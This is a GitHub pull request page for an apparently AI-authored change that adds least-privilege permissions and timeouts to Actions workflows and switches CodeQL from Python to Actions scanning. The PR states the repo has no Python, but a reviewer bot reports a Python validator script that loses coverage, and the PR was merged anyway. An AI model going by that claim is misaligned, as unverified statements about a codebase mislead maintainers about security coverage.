Skip to content

ci: harden github workflows with least-privilege permissions and timeouts#14

Merged
OgeonX-Ai merged 1 commit into
mainfrom
fix/cas-workstation-workflow-hardening
Jul 3, 2026
Merged

ci: harden github workflows with least-privilege permissions and timeouts#14
OgeonX-Ai merged 1 commit into
mainfrom
fix/cas-workstation-workflow-hardening

Conversation

@OgeonX-Ai

Copy link
Copy Markdown
Contributor

Summary

Hardens this repo's GitHub Actions workflows. Workflow YAML only — no PowerShell scripts or quality-gate logic were touched.

CodeQL decision + rationale

codeql.yml previously set the analysis matrix to language: [ 'python' ], but this repo contains no Python — it is PowerShell + JSON. CodeQL has no PowerShell analyzer, so a python run analyzed nothing and effectively wasted CI while giving a false sense of security coverage.

Decision: switch the matrix to language: [ 'actions' ] rather than deleting the workflow. CodeQL's actions pack scans GitHub Actions workflow files for real issues (e.g. injection via untrusted ${{ github.event.* }}, over-broad pull_request_target usage, unpinned/dangerous action patterns). This repo has five workflows worth scanning, one of which (pr-lint.yml) uses pull_request_target, so actions analysis adds genuine value. Keeping the workflow (retargeted) is strictly better than removing it.

Per-file changes

File permissions timeout-minutes
codeql.yml added top-level contents: read (job-level already scoped: actions: read, contents: read, security-events: write) + matrix pythonactions added 15 on analyze
pages.yml already least-privilege (contents: read, pages: write, id-token: write) — unchanged added 10 on build and deploy
pr-lint.yml added top-level contents: read, pull-requests: read added 10 on main
stale.yml added top-level contents: read, issues: write, pull-requests: write added 10 on stale
quality.yml already hardened (contents: read + per-step/job timeouts) — unchanged already 20

Validation

All five workflow files parse cleanly via yaml.safe_load (PyYAML). No syntax regressions.

🤖 Generated with Claude Code

…outs

Scope: workflow YAML hardening only; no PowerShell or quality-logic changes.

- codeql.yml: switch analysis matrix from 'python' (repo has no Python;
  CodeQL cannot analyze PowerShell) to 'actions' so the workflows
  themselves are scanned; add top-level contents:read and a 15m job
  timeout.
- pages.yml: add 10m timeouts to build and deploy jobs (top-level
  permissions already least-privilege).
- pr-lint.yml: add top-level permissions (contents:read,
  pull-requests:read) and a 10m job timeout.
- stale.yml: add top-level permissions (contents:read, issues:write,
  pull-requests:write) and a 10m job timeout.
- quality.yml: already hardened; unchanged.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
@github-advanced-security

Copy link
Copy Markdown

You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

  • The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
  • Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
  • You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 34c098df1f

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

fail-fast: false
matrix:
language: [ 'python' ]
language: [ 'actions' ]

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P2 Badge Keep Python in the CodeQL matrix

This replaces the existing Python CodeQL job instead of adding Actions scanning alongside it. The repo still has executable Python code (scripts/validate_json_schema.py) that is invoked by scripts/Test-CasJsonSchema.ps1:11 and :33, so after this change CodeQL will only analyze workflow YAML and the Python validator loses code-scanning coverage on every push/PR. Include both python and actions in the matrix if the goal is to harden workflows without dropping existing coverage.

Useful? React with 👍 / 👎.

@OgeonX-Ai OgeonX-Ai merged commit e2d0905 into main Jul 3, 2026
4 checks passed
@OgeonX-Ai OgeonX-Ai deleted the fix/cas-workstation-workflow-hardening branch July 3, 2026 16:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants